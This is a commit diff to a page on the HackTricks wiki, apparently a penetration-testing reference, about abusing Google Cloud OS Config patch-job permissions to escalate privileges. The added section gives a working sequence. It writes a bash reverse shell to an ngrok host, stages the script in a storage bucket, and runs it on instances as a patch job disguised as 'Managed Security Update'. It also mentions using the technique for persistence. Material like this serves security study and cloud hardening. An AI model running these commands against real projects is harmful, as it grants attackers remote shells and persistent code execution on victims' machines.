GITBOOK-634: No subject

HackTricks-wiki · Jun 22, 2024 · fbbb160 · fbbb160
1 parent 5276c2e
commit fbbb160
Showing 1 changed file with 29 additions and 5 deletions.
diff --git a/...sting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md b/...sting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md
@@ -84,17 +84,41 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
 
 If you have the **`osconfig.patchDeployments.create`** or **`osconfig.patchJobs.exec`** permissions you can create a [**patch job or deployment**](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching). This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project.
 
-If you want to manually exploit this you will need to create either a [patch job](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) or [deployment](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json) for a patch job run:
+Note that at the moment you **don't need `astAs` permission** over the SA attached to the instance.
 
-`gcloud compute os-config patch-jobs execute --file=patch.json`
+If you want to manually exploit this you will need to create either a [**patch job**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_job.json) **or** [**deployment**](https://github.com/rek7/patchy/blob/main/pkg/engine/patches/patch\_deployment.json)**.**\
+For a patch job run:
+
+{% code overflow="wrap" %}
+```python
+cat > /tmp/patch-job.sh <<EOF
+#!/bin/bash
+bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1
+EOF
+
+gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh
+
+# Get the generation number
+gsutil ls -a gs://readable-bucket-by-sa-in-instance
+
+gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \
+ --instance-filter-names=zones/us-central1-a/instances/<instance-name> \
+ --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh#<generation-number> \
+ --reboot-config=never \
+ --display-name="Managed Security Update" \
+ --duration=300s
+```
+{% endcode %}
 
 To deploy a patch deployment:
 
-`gcloud compute os-config patch-deployments create my-update --file=patch.json`
+```bash
+gcloud compute os-config patch-deployments create <name> ...
+```
 
-Automated tooling such as [patchy](https://github.com/rek7/patchy) exists to detect lax permissions and automatically move laterally.
+The tool [patchy](https://github.com/rek7/patchy) could been used in the past for exploiting this misconfiguration (but now it's not working).
 
-**You can also abuse this for persistence.**
+**An attacker could also abuse this for persistence.**
 
 ### `compute.machineImages.setIamPolicy`